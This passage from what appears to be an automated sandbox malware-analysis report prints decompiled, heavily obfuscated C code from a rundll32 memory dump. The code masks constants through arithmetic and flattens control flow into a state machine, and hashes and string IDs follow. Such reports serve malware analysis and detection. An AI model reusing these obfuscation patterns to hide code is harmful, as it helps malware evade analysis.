				signed int _t852;
				signed int _t858;
				signed int _t930;
				signed int _t931;
				void* _t936;
				signed int* _t937;
				void* _t945;

				_t937 =  &_v2940;
				_v2888 = 0x58ed27;
				_v2888 = _v2888 | 0x83563905;
				_v2888 = _v2888 * 0x46;
				_t936 = __ecx;
				_t931 = 0x63d9dbc;
				_t832 = 0x70;
				_v2888 = _v2888 * 0x21;
				_v2888 = _v2888 ^ 0x6b204dc3;
				_v2700 = 0xe9de42;
				_v2700 = _v2700 >> 0xa;
				_v2700 = _v2700 ^ 0x00103a77;
				_v2936 = 0x549012;
				_v2936 = _v2936 + 0x60a5;
				_v2936 = _v2936 >> 7;
				_v2936 = _v2936 | 0x1d415c41;
				_v2936 = _v2936 ^ 0x1d4ed04e;
				_v2808 = 0xe235c3;
				_v2808 = _v2808 >> 0x10;
				_v2808 = _v2808 ^ 0xf71055a5;
				_v2808 = _v2808 ^ 0xf7181377;
				_v2788 = 0x4c3834;
				_v2788 = _v2788 >> 0xa;
				_v2788 = _v2788 + 0x8e2;
				_v2788 = _v2788 ^ 0x000a3430;
				_v2844 = 0x57ca8b;
				_v2844 = _v2844 ^ 0xd732e8d9;
				_v2844 = _v2844 << 4;
				_v2844 = _v2844 ^ 0x7657b035;
				_v2920 = 0x3116bc;
				_v2920 = _v2920 / _t832;
				_v2920 = _v2920 << 7;
				_v2920 = _v2920 | 0xbaa7d477;
				_v2920 = _v2920 ^ 0xbab318b9;
				_v2864 = 0x147254;
				_v2864 = _v2864 >> 0x10;
				_v2864 = _v2864 ^ 0xe9282c9a;
				_t833 = 0x42;
				_v2864 = _v2864 * 0x67;
				_v2864 = _v2864 ^ 0xcf208e56;
				_v2628 = 0x43de16;
				_v2628 = _v2628 / _t833;
				_v2628 = _v2628 ^ 0x00078ced;
				_v2880 = 0xe32302;
				_v2880 = _v2880 << 0xa;
				_t834 = 0x66;
				_v2880 = _v2880 / _t834;
				_v2880 = _v2880 | 0x6d622614;
				_v2880 = _v2880 ^ 0x6d625826;
				_v2904 = 0x214f4b;
				_t835 = 0x64;
				_v2904 = _v2904 / _t835;
				_v2904 = _v2904 << 7;
				_v2904 = _v2904 ^ 0x5c13da49;
				_v2904 = _v2904 ^ 0x5c3fedf9;
				_v2632 = 0x15dffa;
				_v2632 = _v2632 | 0xc7418eca;
				_v2632 = _v2632 ^ 0xc75c6c30;
				_v2692 = 0x7a9c1f;
				_v2692 = _v2692 >> 9;
				_v2692 = _v2692 ^ 0x00075ef2;
				_v2840 = 0xf91be9;
				_v2840 = _v2840 << 0xb;
				_v2840 = _v2840 >> 0xc;
				_v2840 = _v2840 ^ 0x00055b58;
				_v2684 = 0x12d980;
				_v2684 = _v2684 ^ 0x93e0c374;
				_v2684 = _v2684 ^ 0x93f47314;
				_v2832 = 0x3fcd4e;
				_t836 = 0x39;
				_v2832 = _v2832 * 0x23;
				_v2832 = _v2832 ^ 0x731c45b4;
				_v2832 = _v2832 ^ 0x7ba35a76;
				_v2932 = 0xb82be4;
				_v2932 = _v2932 >> 2;
				_v2932 = _v2932 + 0xffffbbf6;
				_v2932 = _v2932 ^ 0xe6b723f0;
				_v2932 = _v2932 ^ 0xe690d0e6;
				_v2940 = 0xf6526b;
				_v2940 = _v2940 | 0x896b4159;
				_v2940 = _v2940 >> 3;
				_v2940 = _v2940 | 0x09d41357;
				_v2940 = _v2940 ^ 0x19f157b8;
				_v2676 = 0xe71313;
				_v2676 = _v2676 << 0xd;
				_v2676 = _v2676 ^ 0xe2630a9f;
				_v2640 = 0xe3d77b;
				_v2640 = _v2640 * 0x19;
				_v2640 = _v2640 ^ 0x1648a918;
				_v2816 = 0xdf828c;
				_v2816 = _v2816 | 0xf06a9773;
				_v2816 = _v2816 + 0x1ac7;
				_v2816 = _v2816 ^ 0xf0f0cf03;
				_v2644 = 0x24d1c;
				_v2644 = _v2644 >> 0xd;
				_v2644 = _v2644 ^ 0x000db5f9;
				_v2668 = 0x9507be;
				_v2668 = _v2668 + 0xd758;
				_v2668 = _v2668 ^ 0x009d301b;
				_v2824 = 0xe674f2;
				_v2824 = _v2824 + 0xffffc4e0;
				_v2824 = _v2824 ^ 0xd4611b5a;
				_v2824 = _v2824 ^ 0xd482eada;
				_v2648 = 0x3f77b6;
				_v2648 = _v2648 * 0x1f;
				_v2648 = _v2648 ^ 0x07a98b69;
				_v2916 = 0xdc78a8;
				_v2916 = _v2916 << 5;
				_v2916 = _v2916 / _t836;
				_t837 = 0x7a;
				_v2916 = _v2916 * 0x39;
				_v2916 = _v2916 ^ 0x1b8ad1f1;
				_v2728 = 0xa8155b;
				_v2728 = _v2728 >> 0xd;
				_v2728 = _v2728 ^ 0x000db557;
				_v2924 = 0xc6e5a0;
				_v2924 = _v2924 * 0x2c;
				_v2924 = _v2924 << 5;
				_v2924 = _v2924 | 0x115a405f;
				_v2924 = _v2924 ^ 0x55fa9076;
				_v2856 = 0x96149c;
				_v2856 = _v2856 / _t837;
				_v2856 = _v2856 + 0xf5fc;
				_v2856 = _v2856 ^ 0x000b25f1;
				_v2908 = 0xf2f954;
				_v2908 = _v2908 << 6;
				_v2908 = _v2908 + 0xac42;
				_v2908 = _v2908 ^ 0xa8828693;
				_v2908 = _v2908 ^ 0x943e6ee2;
				_v2732 = 0x9d6f74;
				_t838 = 0x46;
				_v2732 = _v2732 / _t838;
				_v2732 = _v2732 ^ 0x000ebec1;
				_v2820 = 0x59e1c1;
				_v2820 = _v2820 * 0x4d;
				_v2820 = _v2820 / _t838;
				_v2820 = _v2820 ^ 0x00608b59;
				_v2716 = 0x351287;
				_v2716 = _v2716 >> 1;
				_v2716 = _v2716 ^ 0x0018d4d2;
				_v2812 = 0xcb2c1b;
				_t839 = 0x2b;
				_v2812 = _v2812 / _t839;
				_v2812 = _v2812 + 0xffff7101;
				_v2812 = _v2812 ^ 0x0007f207;
				_v2660 = 0xceb36b;
				_t840 = 0x67;
				_v2660 = _v2660 / _t840;
				_v2660 = _v2660 ^ 0x000d619e;
				_v2744 = 0xbb097e;
				_v2744 = _v2744 | 0xecb8e5a6;
				_v2744 = _v2744 << 7;
				_v2744 = _v2744 ^ 0x5df8a0e4;
				_v2912 = 0xf8d451;
				_v2912 = _v2912 >> 4;
				_v2912 = _v2912 | 0xaea8ed4c;
				_v2912 = _v2912 + 0xffff0521;
				_v2912 = _v2912 ^ 0xaea7c2f3;
				_v2752 = 0x565eb7;
				_v2752 = _v2752 * 0x70;
				_v2752 = _v2752 * 0x24;
				_v2752 = _v2752 ^ 0x505f8268;
				_v2652 = 0xc20920;
				_v2652 = _v2652 * 0x66;
				_v2652 = _v2652 ^ 0x4d45043e;
				_v2804 = 0x19938d;
				_v2804 = _v2804 << 0xb;
				_v2804 = _v2804 >> 6;
				_v2804 = _v2804 ^ 0x0331c866;
				_v2708 = 0x9f0ca5;
				_v2708 = _v2708 + 0x5236;
				_v2708 = _v2708 ^ 0x009f1cbf;
				_v2636 = 0x17d7da;
				_v2636 = _v2636 + 0xffff61a3;
				_v2636 = _v2636 ^ 0x001c6ee3;
				_v2772 = 0x640c2e;
				_v2772 = _v2772 | 0xfe977bed;
				_v2772 = _v2772 ^ 0xfef1aca3;
				_v2712 = 0x57713;
				_v2712 = _v2712 | 0x1719e5a8;
				_v2712 = _v2712 ^ 0x171223b6;
				_v2800 = 0xacde46;
				_v2800 = _v2800 << 3;
				_v2800 = _v2800 >> 0xb;
				_v2800 = _v2800 ^ 0x00094896;
				_v2900 = 0xf23167;
				_v2900 = _v2900 << 8;
				_t841 = 0x63;
				_v2900 = _v2900 / _t841;
				_v2900 = _v2900 + 0xcf21;
				_v2900 = _v2900 ^ 0x02793070;
				_v2720 = 0x2ffea5;
				_v2720 = _v2720 >> 0xa;
				_v2720 = _v2720 ^ 0x000a3377;
				_v2760 = 0x7162f3;
				_v2760 = _v2760 + 0x3cd5;
				_t842 = 0x38;
				_v2760 = _v2760 / _t842;
				_v2760 = _v2760 ^ 0x0007aff4;
				_v2928 = 0x75cba7;
				_v2928 = _v2928 >> 6;
				_t843 = 0x74;
				_v2928 = _v2928 / _t843;
				_t844 = 0x21;
				_v2928 = _v2928 * 0x5b;
				_v2928 = _v2928 ^ 0x00010bb2;
				_v2896 = 0xbdd326;
				_v2896 = _v2896 | 0x8e80784e;
				_v2896 = _v2896 + 0xffff4642;
				_v2896 = _v2896 + 0xfffff2a7;
				_v2896 = _v2896 ^ 0x8eb0d4b0;
				_v2724 = 0x540c5f;
				_v2724 = _v2724 | 0x0f00b7a6;
				_v2724 = _v2724 ^ 0x0f539187;
				_v2672 = 0x9e9c9c;
				_v2672 = _v2672 | 0xc48b5739;
				_v2672 = _v2672 ^ 0xc4908703;
				_v2776 = 0xa23bdf;
				_v2776 = _v2776 * 0x51;
				_v2776 = _v2776 + 0xe0c7;
				_v2776 = _v2776 ^ 0x335416a6;
				_v2680 = 0x681f8;
				_v2680 = _v2680 + 0xffff4f6a;
				_v2680 = _v2680 ^ 0x00015d99;
				_v2784 = 0xd006bd;
				_v2784 = _v2784 / _t844;
				_v2784 = _v2784 + 0xffffb229;
				_v2784 = _v2784 ^ 0x00021ec3;
				_v2884 = 0x9df7f6;
				_v2884 = _v2884 << 3;
				_v2884 = _v2884 >> 0xa;
                                                                                                                      				_v2884 = _v2884 ^ 0x9c3d07c3;
                                                                                                                      				_v2884 = _v2884 ^ 0x9c378ea0;
                                                                                                                      				_v2664 = 0x8a5c5e;
                                                                                                                      				_v2664 = _v2664 + 0xb05;
                                                                                                                      				_v2664 = _v2664 ^ 0x008bdf18;
                                                                                                                      				_v2892 = 0xf8cc9d;
                                                                                                                      				_v2892 = _v2892 * 0x75;
                                                                                                                      				_v2892 = _v2892 * 0x2f;
                                                                                                                      				_v2892 = _v2892 + 0x5b88;
                                                                                                                      				_v2892 = _v2892 ^ 0xe0504abc;
                                                                                                                      				_v2768 = 0xf7b3ac;
                                                                                                                      				_v2768 = _v2768 * 0x12;
                                                                                                                      				_v2768 = _v2768 * 0x37;
                                                                                                                      				_v2768 = _v2768 ^ 0xbde7c305;
                                                                                                                      				_v2736 = 0x24d80;
                                                                                                                      				_v2736 = _v2736 + 0xc084;
                                                                                                                      				_v2736 = _v2736 ^ 0x0003dff9;
                                                                                                                      				_v2756 = 0xcbd51;
                                                                                                                      				_v2756 = _v2756 ^ 0x3e0e537e;
                                                                                                                      				_t845 = 0x33;
                                                                                                                      				_v2756 = _v2756 / _t845;
                                                                                                                      				_v2756 = _v2756 ^ 0x01338860;
                                                                                                                      				_v2876 = 0x572b9a;
                                                                                                                      				_v2876 = _v2876 | 0xf33633ff;
                                                                                                                      				_v2876 = _v2876 + 0xffffc963;
                                                                                                                      				_t846 = 9;
                                                                                                                      				_v2876 = _v2876 * 0x5a;
                                                                                                                      				_v2876 = _v2876 ^ 0x97d6d328;
                                                                                                                      				_v2780 = 0x1c7f97;
                                                                                                                      				_v2780 = _v2780 | 0xd857d991;
                                                                                                                      				_v2780 = _v2780 ^ 0x2bc247dc;
                                                                                                                      				_v2780 = _v2780 ^ 0xf39978d6;
                                                                                                                      				_v2828 = 0x976a05;
                                                                                                                      				_v2828 = _v2828 << 2;
                                                                                                                      				_v2828 = _v2828 + 0x20c3;
                                                                                                                      				_v2828 = _v2828 ^ 0x0259597b;
                                                                                                                      				_v2764 = 0x91cc1a;
                                                                                                                      				_v2764 = _v2764 ^ 0x7e34b684;
                                                                                                                      				_v2764 = _v2764 / _t846;
                                                                                                                      				_v2764 = _v2764 ^ 0x0e161a93;
                                                                                                                      				_v2836 = 0xb2bb8f;
                                                                                                                      				_v2836 = _v2836 ^ 0xe08a2441;
                                                                                                                      				_v2836 = _v2836 << 9;
                                                                                                                      				_v2836 = _v2836 ^ 0x713d110f;
                                                                                                                      				_v2656 = 0xe40eab;
                                                                                                                      				_t847 = 0x44;
                                                                                                                      				_v2656 = _v2656 / _t847;
                                                                                                                      				_v2656 = _v2656 ^ 0x00028457;
                                                                                                                      				_v2848 = 0xe3c04;
                                                                                                                      				_t848 = 0x16;
                                                                                                                      				_v2848 = _v2848 * 0x5d;
                                                                                                                      				_v2848 = _v2848 + 0xc20e;
                                                                                                                      				_v2848 = _v2848 ^ 0x0525732a;
                                                                                                                      				_v2872 = 0x975bd1;
                                                                                                                      				_v2872 = _v2872 / _t848;
                                                                                                                      				_v2872 = _v2872 >> 1;
                                                                                                                      				_t849 = 0x62;
                                                                                                                      				_v2872 = _v2872 / _t849;
                                                                                                                      				_v2872 = _v2872 ^ 0x00094208;
                                                                                                                      				_v2852 = 0xde6f00;
                                                                                                                      				_v2852 = _v2852 + 0xdf6f;
                                                                                                                      				_t850 = 0x4c;
                                                                                                                      				_v2852 = _v2852 / _t850;
                                                                                                                      				_v2852 = _v2852 ^ 0x0009f2db;
                                                                                                                      				_v2796 = 0x43f736;
                                                                                                                      				_t851 = 0x53;
                                                                                                                      				_v2796 = _v2796 / _t851;
                                                                                                                      				_v2796 = _v2796 + 0x7bc9;
                                                                                                                      				_v2796 = _v2796 ^ 0x00042e34;
                                                                                                                      				_v2688 = 0xf8ab78;
                                                                                                                      				_t852 = 0x3c;
                                                                                                                      				_v2688 = _v2688 * 0x22;
                                                                                                                      				_v2688 = _v2688 ^ 0x21025542;
                                                                                                                      				_v2696 = 0x9e8755;
                                                                                                                      				_v2696 = _v2696 + 0xe3ef;
                                                                                                                      				_v2696 = _v2696 ^ 0x00960058;
                                                                                                                      				_v2792 = 0x415dac;
                                                                                                                      				_v2792 = _v2792 >> 1;
                                                                                                                      				_v2792 = _v2792 + 0xffffd338;
                                                                                                                      				_v2792 = _v2792 ^ 0x002ca457;
                                                                                                                      				_v2704 = 0xb8f6ce;
                                                                                                                      				_v2704 = _v2704 + 0xffff4ac5;
                                                                                                                      				_v2704 = _v2704 ^ 0x00b9d8ec;
                                                                                                                      				_v2860 = 0x12dd79;
                                                                                                                      				_v2860 = _v2860 ^ 0x144e403a;
                                                                                                                      				_v2860 = _v2860 / _t852;
                                                                                                                      				_v2860 = _v2860 ^ 0x93d5fcb7;
                                                                                                                      				_v2860 = _v2860 ^ 0x93828b4c;
                                                                                                                      				_v2868 = 0x481259;
                                                                                                                      				_v2868 = _v2868 ^ 0xea83c1db;
                                                                                                                      				_v2868 = _v2868 + 0xffff22f6;
                                                                                                                      				_v2868 = _v2868 | 0xf9bd7925;
                                                                                                                      				_v2868 = _v2868 ^ 0xfbfe4ce9;
                                                                                                                      				_v2740 = 0xefe715;
                                                                                                                      				_v2740 = _v2740 << 7;
                                                                                                                      				_v2740 = _v2740 >> 5;
                                                                                                                      				_v2740 = _v2740 ^ 0x03bc65a1;
                                                                                                                      				_v2748 = 0x39cd9f;
                                                                                                                      				_v2748 = _v2748 * 0x16;
                                                                                                                      				_v2748 = _v2748 + 0xefc3;
                                                                                                                      				_v2748 = _v2748 ^ 0x04f9debc;
                                                                                                                      				_t797 = E00358FD2(_t852);
                                                                                                                      				_t930 = _v2736;
                                                                                                                      				_t830 = _t797;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_t798 = 0x7e670bc;
                                                                                                                      					do {
                                                                                                                      						while(1) {
                                                                                                                      							L2:
                                                                                                                      							_t945 = _t931 - 0x7d4716d;
                                                                                                                      							if(_t945 > 0) {
                                                                                                                      								break;
                                                                                                                      							}
                                                                                                                      							if(_t945 == 0) {
                                                                                                                      								_t858 = _v2848;
                                                                                                                      								E003468DE(_t858, _v2872, _v2852, _v2796, _t930);
                                                                                                                      								_t937 =  &(_t937[3]);
                                                                                                                      								_t931 = 0x97d4d6b;
                                                                                                                      								while(1) {
                                                                                                                      									L1:
                                                                                                                      									_t798 = 0x7e670bc;
                                                                                                                      									goto L2;
                                                                                                                      								}
                                                                                                                      							} else {
                                                                                                                      								if(_t931 == 0x9f9f0c) {
                                                                                                                      									_v2612 = E003613A6();
                                                                                                                      									_v2608 = 2 + E0035BA68(_v2716, _v2812, _v2660, _t808, _v2744) * 2;
                                                                                                                      									_t858 = _t830;
                                                                                                                      									_t812 = E00345EB5(_t858, _v2912, _t830, _v2752,  &_v2616, _v2700, _v2652, _v2804, _v2708, _t830, _v2716, _v2716, _v2636, _v2772);
                                                                                                                      									_t937 =  &(_t937[0xf]);
                                                                                                                      									__eflags = _t812;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										_t931 = 0xaab8dea;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t798 = 0x7e670bc;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t931 == 0x1e136d2) {
                                                                                                                      										_push(_v2656);
                                                                                                                      										_push(_v2836);
                                                                                                                      										_push(_v2764);
                                                                                                                      										_push(0);
                                                                                                                      										_push(0);
                                                                                                                      										_push(_v2828);
                                                                                                                      										_push(_t858);
                                                                                                                      										_push(1);
                                                                                                                      										_t858 =  &_v1044;
                                                                                                                      										E00349700(_t858, _v2780, __eflags);
                                                                                                                      										_t937 =  &(_t937[8]);
                                                                                                                      										_t931 = 0x7d4716d;
                                                                                                                      										while(1) {
                                                                                                                      											L1:
                                                                                                                      											_t798 = 0x7e670bc;
                                                                                                                      											goto L2;
                                                                                                                      										}
                                                                                                                      									} else {
                                                                                                                      										if(_t931 == 0x2dbd64b) {
                                                                                                                      											return E00354DAD(_v2860, _v2868, _v2616, _v2740, _v2748);
                                                                                                                      										}
                                                                                                                      										if(_t931 == 0x63d9dbc) {
                                                                                                                      											_push(_t858);
                                                                                                                      											E0034EA7B( &_v524, _v2788, _v2888, _t858, _v2844, _v2920, _v2864);
                                                                                                                      											_t937 =  &(_t937[7]);
                                                                                                                      											_t931 = 0xc6ce6ce;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t798 = 0x7e670bc;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										} else {
                                                                                                                      											if(_t931 != 0x7253c5e) {
                                                                                                                      												goto L24;
                                                                                                                      											} else {
                                                                                                                      												_t858 = _v2760;
                                                                                                                      												_t930 = E0035C9A9(_v2928, _v2896, _v2624, _v2724, _v2620);
                                                                                                                      												_t937 =  &(_t937[4]);
                                                                                                                      												_t798 = 0x7e670bc;
                                                                                                                      												_t931 =  !=  ? 0x7e670bc : 0x97d4d6b;
                                                                                                                      												continue;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      									L28:
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      							L27:
                                                                                                                      							return _t812;
                                                                                                                      							goto L28;
                                                                                                                      						}
                                                                                                                      						__eflags = _t931 - _t798;
                                                                                                                      						if(__eflags == 0) {
                                                                                                                      							_push(_v2784);
                                                                                                                      							_push(_v2680);
                                                                                                                      							_push(0x34190c);
                                                                                                                      							E0035D37B(E0034AB66(_v2672, _v2776, __eflags), __eflags, _v2664, _t930, _v2672, _v2892,  &_v524,  &_v1044,  &_v2604, _v2768);
                                                                                                                      							E0034AE03(_v2736, _v2756, _v2876, _t799);
                                                                                                                      							_t937 =  &(_t937[0xd]);
                                                                                                                      							_t931 = 0x1e136d2;
                                                                                                                      							_t798 = 0x7e670bc;
                                                                                                                      							goto L24;
                                                                                                                      						} else {
                                                                                                                      							__eflags = _t931 - 0x97d4d6b;
                                                                                                                      							if(_t931 == 0x97d4d6b) {
                                                                                                                      								E003468DE(_v2688, _v2696, _v2792, _v2704, _v2624);
                                                                                                                      								_t937 =  &(_t937[3]);
                                                                                                                      								_t931 = 0x2dbd64b;
                                                                                                                      								goto L1;
                                                                                                                      							} else {
                                                                                                                      								__eflags = _t931 - 0xaab8dea;
                                                                                                                      								if(_t931 == 0xaab8dea) {
                                                                                                                      									E0034777B(_v2712,  &_v2624,  &_v2616, _v2800, _v2900, _v2720);
                                                                                                                      									_t937 =  &(_t937[4]);
                                                                                                                      									asm("sbb esi, esi");
                                                                                                                      									_t931 = (_t931 & 0x04496613) + 0x2dbd64b;
                                                                                                                      									while(1) {
                                                                                                                      										L1:
                                                                                                                      										_t798 = 0x7e670bc;
                                                                                                                      										goto L2;
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									__eflags = _t931 - 0xc6ce6ce;
                                                                                                                      									if(__eflags != 0) {
                                                                                                                      										goto L24;
                                                                                                                      									} else {
                                                                                                                      										E003612A8(_t858, _v2628, __eflags, _v2880, _v2904,  &_v2084);
                                                                                                                      										 *((short*)(E00354FA8(_v2632,  &_v2084, _v2692, _v2840))) = 0;
                                                                                                                      										E00348650(_v2684,  &_v1564, __eflags, _v2832);
                                                                                                                      										_push(_v2640);
                                                                                                                      										_push(_v2676);
                                                                                                                      										_push(0x34181c);
                                                                                                                      										E0034E7CE(E0034AB66(_v2932, _v2940, __eflags), __eflags, _v2816,  &_v2084, _v2932, _v2644, _v2668, _v2824, _v2648,  &_v1564);
                                                                                                                      										E0034AE03(_v2916, _v2728, _v2924, _t825);
                                                                                                                      										_t858 = _v2856;
                                                                                                                      										_t812 = E0035C38F(_t858,  &_v2604, _t936, _v2908);
                                                                                                                      										_t937 =  &(_t937[0x15]);
                                                                                                                      										__eflags = _t812;
                                                                                                                      										if(__eflags != 0) {
                                                                                                                      											_t931 = 0x9f9f0c;
                                                                                                                      											while(1) {
                                                                                                                      												L1:
                                                                                                                      												_t798 = 0x7e670bc;
                                                                                                                      												goto L2;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      						goto L27;
                                                                                                                      						L24:
                                                                                                                      						__eflags = _t931 - 0xd142a7e;
                                                                                                                      					} while (__eflags != 0);
                                                                                                                      					return _t798;
                                                                                                                      				}
                                                                                                                      			}



























































































































                                                                                                                      0x00344e96
                                                                                                                      0x00344e97
                                                                                                                      0x00344e9b
                                                                                                                      0x00344ea3
                                                                                                                      0x00344eab
                                                                                                                      0x00344eb3
                                                                                                                      0x00344ebb
                                                                                                                      0x00344ec3
                                                                                                                      0x00344ecb
                                                                                                                      0x00344ed6
                                                                                                                      0x00344ee1
                                                                                                                      0x00344eec
                                                                                                                      0x00344ef7
                                                                                                                      0x00344f02
                                                                                                                      0x00344f0d
                                                                                                                      0x00344f20
                                                                                                                      0x00344f27
                                                                                                                      0x00344f32
                                                                                                                      0x00344f3d
                                                                                                                      0x00344f48
                                                                                                                      0x00344f53
                                                                                                                      0x00344f5e
                                                                                                                      0x00344f72
                                                                                                                      0x00344f79
                                                                                                                      0x00344f84
                                                                                                                      0x00344f8f
                                                                                                                      0x00344f97
                                                                                                                      0x00344f9c
                                                                                                                      0x00344fa1
                                                                                                                      0x00344fa9
                                                                                                                      0x00344fb1
                                                                                                                      0x00344fbc
                                                                                                                      0x00344fc7
                                                                                                                      0x00344fd2
                                                                                                                      0x00344fdf
                                                                                                                      0x00344fe8
                                                                                                                      0x00344fec
                                                                                                                      0x00344ff4
                                                                                                                      0x00344ffc
                                                                                                                      0x0034500f
                                                                                                                      0x0034501e
                                                                                                                      0x00345025
                                                                                                                      0x00345030
                                                                                                                      0x0034503b
                                                                                                                      0x00345046
                                                                                                                      0x00345051
                                                                                                                      0x0034505e
                                                                                                                      0x00345072
                                                                                                                      0x00345077
                                                                                                                      0x00345080
                                                                                                                      0x0034508b
                                                                                                                      0x00345093
                                                                                                                      0x0034509b
                                                                                                                      0x003450a8
                                                                                                                      0x003450ab
                                                                                                                      0x003450af
                                                                                                                      0x003450b7
                                                                                                                      0x003450c2
                                                                                                                      0x003450cd
                                                                                                                      0x003450d8
                                                                                                                      0x003450e3
                                                                                                                      0x003450ee
                                                                                                                      0x003450f6
                                                                                                                      0x00345101
                                                                                                                      0x0034510c
                                                                                                                      0x00345117
                                                                                                                      0x0034512d
                                                                                                                      0x00345134
                                                                                                                      0x0034513f
                                                                                                                      0x00345147
                                                                                                                      0x0034514f
                                                                                                                      0x00345154
                                                                                                                      0x0034515c
                                                                                                                      0x0034516e
                                                                                                                      0x00345173
                                                                                                                      0x0034517c
                                                                                                                      0x00345187
                                                                                                                      0x00345194
                                                                                                                      0x00345197
                                                                                                                      0x0034519b
                                                                                                                      0x003451a3
                                                                                                                      0x003451ab
                                                                                                                      0x003451bb
                                                                                                                      0x003451bf
                                                                                                                      0x003451c7
                                                                                                                      0x003451cc
                                                                                                                      0x003451d2
                                                                                                                      0x003451da
                                                                                                                      0x003451e2
                                                                                                                      0x003451ee
                                                                                                                      0x003451f3
                                                                                                                      0x003451f9
                                                                                                                      0x00345201
                                                                                                                      0x00345213
                                                                                                                      0x00345216
                                                                                                                      0x0034521d
                                                                                                                      0x00345228
                                                                                                                      0x00345235
                                                                                                                      0x0034524a
                                                                                                                      0x0034524b
                                                                                                                      0x00345252
                                                                                                                      0x0034525d
                                                                                                                      0x00345268
                                                                                                                      0x00345273
                                                                                                                      0x0034527e
                                                                                                                      0x00345289
                                                                                                                      0x00345290
                                                                                                                      0x0034529b
                                                                                                                      0x003452a6
                                                                                                                      0x003452b1
                                                                                                                      0x003452bc
                                                                                                                      0x003452c7
                                                                                                                      0x003452cf
                                                                                                                      0x003452dd
                                                                                                                      0x003452e1
                                                                                                                      0x003452e9
                                                                                                                      0x003452f1
                                                                                                                      0x003452f9
                                                                                                                      0x00345301
                                                                                                                      0x00345309
                                                                                                                      0x00345311
                                                                                                                      0x00345319
                                                                                                                      0x00345324
                                                                                                                      0x0034532c
                                                                                                                      0x00345334
                                                                                                                      0x0034533f
                                                                                                                      0x00345352
                                                                                                                      0x00345359
                                                                                                                      0x00345364
                                                                                                                      0x0034537a
                                                                                                                      0x0034537f
                                                                                                                      0x00345386
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x0034538d
                                                                                                                      0x0034538d
                                                                                                                      0x0034538d
                                                                                                                      0x0034538d
                                                                                                                      0x00345393
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00345399
                                                                                                                      0x00345545
                                                                                                                      0x00345549
                                                                                                                      0x0034554e
                                                                                                                      0x00345551
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x0034539f
                                                                                                                      0x003453a5
                                                                                                                      0x003454a5
                                                                                                                      0x003454d8
                                                                                                                      0x003454f7
                                                                                                                      0x0034551b
                                                                                                                      0x00345520
                                                                                                                      0x00345523
                                                                                                                      0x00345525
                                                                                                                      0x0034552b
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x003453ab
                                                                                                                      0x003453b1
                                                                                                                      0x0034544b
                                                                                                                      0x00345452
                                                                                                                      0x00345456
                                                                                                                      0x0034545d
                                                                                                                      0x0034545f
                                                                                                                      0x00345461
                                                                                                                      0x0034546f
                                                                                                                      0x00345470
                                                                                                                      0x00345472
                                                                                                                      0x00345479
                                                                                                                      0x0034547e
                                                                                                                      0x00345481
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x003453b7
                                                                                                                      0x003453bd
                                                                                                                      0x00000000
                                                                                                                      0x003457c0
                                                                                                                      0x003453c9
                                                                                                                      0x00345419
                                                                                                                      0x00345439
                                                                                                                      0x0034543e
                                                                                                                      0x00345441
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00345388
                                                                                                                      0x00000000
                                                                                                                      0x00345388
                                                                                                                      0x003453cb
                                                                                                                      0x003453d1
                                                                                                                      0x00000000
                                                                                                                      0x003453d7
                                                                                                                      0x003453f4
                                                                                                                      0x00345400
                                                                                                                      0x00345402
                                                                                                                      0x0034540c
                                                                                                                      0x00345411
                                                                                                                      0x00000000
                                                                                                                      0x00345411
                                                                                                                      0x003453d1
                                                                                                                      0x003453c9
                                                                                                                      0x00000000
                                                                                                                      0x003453b1
                                                                                                                      0x003453a5

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: &Xbm$'X$04$6R$KO!$X$kM}$kM}$kM}$w3
                                                                                                                      • API String ID: 0-3270913840
                                                                                                                      • Opcode ID: 5fe1672b4227ec2c1b300239f9aae8c06c23ba7808152ad32d1b26446d23a4b4
                                                                                                                      • Instruction ID: 4a81ea4931feedc0985e3b667cbb77944eb7de9ab74a07784e1a20c827252707
                                                                                                                      • Opcode Fuzzy Hash: 5fe1672b4227ec2c1b300239f9aae8c06c23ba7808152ad32d1b26446d23a4b4
                                                                                                                      • Instruction Fuzzy Hash: 8F82FE71509380DBD379CF61C98AB9BBBE2BBC4308F10891DE5999A260D7B59948CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E00351831(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                      				char _v8;
                                                                                                                      				char _v12;
                                                                                                                      				intOrPtr _v16;
                                                                                                                      				char _v20;
                                                                                                                      				char _v24;
